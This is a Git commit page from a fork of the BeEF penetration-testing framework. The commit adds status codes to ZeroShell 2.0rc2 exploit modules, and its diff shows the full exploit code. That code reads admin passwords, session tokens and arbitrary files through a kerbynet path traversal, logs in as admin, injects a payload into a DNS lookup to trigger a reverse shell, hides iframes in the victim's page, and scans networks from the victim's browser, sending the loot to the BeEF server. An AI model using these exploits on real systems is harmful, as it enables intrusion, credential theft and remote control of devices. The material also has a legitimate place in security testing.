Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add beef.are.status_success(), beef.are.status_error() or beef.are.status_unknown() status code returned to each beef.net.send() for ZeroShell's modules.

Browse Source
This commit is contained in:
Yann CAM
2016-10-06 10:33:17 +02:00
parent 861e846dbe
commit 528e00bf6e
8 changed files with 35 additions and 35 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js
View File

@@ -10,24 +10,24 @@ beef.execute(function() {
var uripwd = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet";
var pwd = "";
var token = "";
beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
if(response1.status_code == 200){
pwd = response1.response_body.trim();
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
if(response2.status_code == 200){
token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success());
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.are.status_error());
}
});
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.are.status_error());
}
});
});

8
modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js
View File

@@ -5,16 +5,16 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
if(response.status_code == 200){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]", beef.are.status_success());
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error());
}
});
});

8
modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js
View File

@@ -5,16 +5,16 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin";
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin";
beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
if(response.status_code == 200){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]", beef.are.status_success());
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error());
}
});
});

8
modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js
View File

@@ -5,17 +5,17 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var rfile = '<%= @rfile %>';
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile;
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile;
beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
if(response.status_code == 200){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]", beef.are.status_success());
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error());
}
});
});

4
modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js
View File

@@ -5,7 +5,7 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
@@ -14,5 +14,5 @@ beef.execute(function() {
var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
iframe_<%= @command_id %>.setAttribute('src', target);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=BeEF hook should be sent to ZeroShell");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=BeEF hook should be sent to ZeroShell", beef.are.status_unknown());
});

14
modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js
View File

@@ -5,7 +5,7 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
@@ -20,27 +20,27 @@ beef.execute(function() {
beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
if(response1.status_code == 200){
pwd = response1.response_body.trim();
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
if(response2.status_code == 200){
token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success());
beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, {
Action: "Lookup",
Section: "DNS",
DNS: "localhost",
STk: token,
What: payload
What: payload
}, 10, 'script', false, null, function(response3){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.", beef.are.status_unknown());
}
);
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.are.status_error());
}
});
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.are.status_error());
}
});
});

4
modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
View File

@@ -5,7 +5,7 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
@@ -15,5 +15,5 @@ beef.execute(function() {
var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
iframe_<%= @command_id %>.setAttribute('src', target);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.", beef.are.status_unknown());
});

14
modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js
View File

@@ -71,11 +71,11 @@ beef.execute(function() {
var div = document.createElement('div'); // Hidden div container
div.setAttribute('style', 'display:none;');
document.body.appendChild(div);
add = function(data){
result += data + " ";
}
// Scan function to inject <img> markups in victim's DOM.
// This function is recalled by herself to scan each IP bloc of the IP range defined
scan = function(){
@@ -91,13 +91,13 @@ beef.execute(function() {
i++;
}
var ip_to_long_bloc = ip_from_long; // Save the ending IPv4 address for the current bloc
// Function to return results of the current bloc scanned to BeEF C&C, after "timeout" ms waited.
getResult = function(){
if(result.trim() != "")
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]", beef.are.status_success());
else
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc...");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc...", beef.are.status_unknown());
div.innerHTML = ""; // Clean the current DOM's div
result = ""; // Clear the result of the bloc tested for the next loop
}
@@ -107,9 +107,9 @@ beef.execute(function() {
else // We have reach the last IP address to scan
setTimeout(function(){ // Clear the victim's DOM and tell to BeEF C&C that the scan is complete
document.body.removeChild(div);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)", beef.are.status_success());
}, timeout*2);
}
scan(); // Run the first bloc scan
});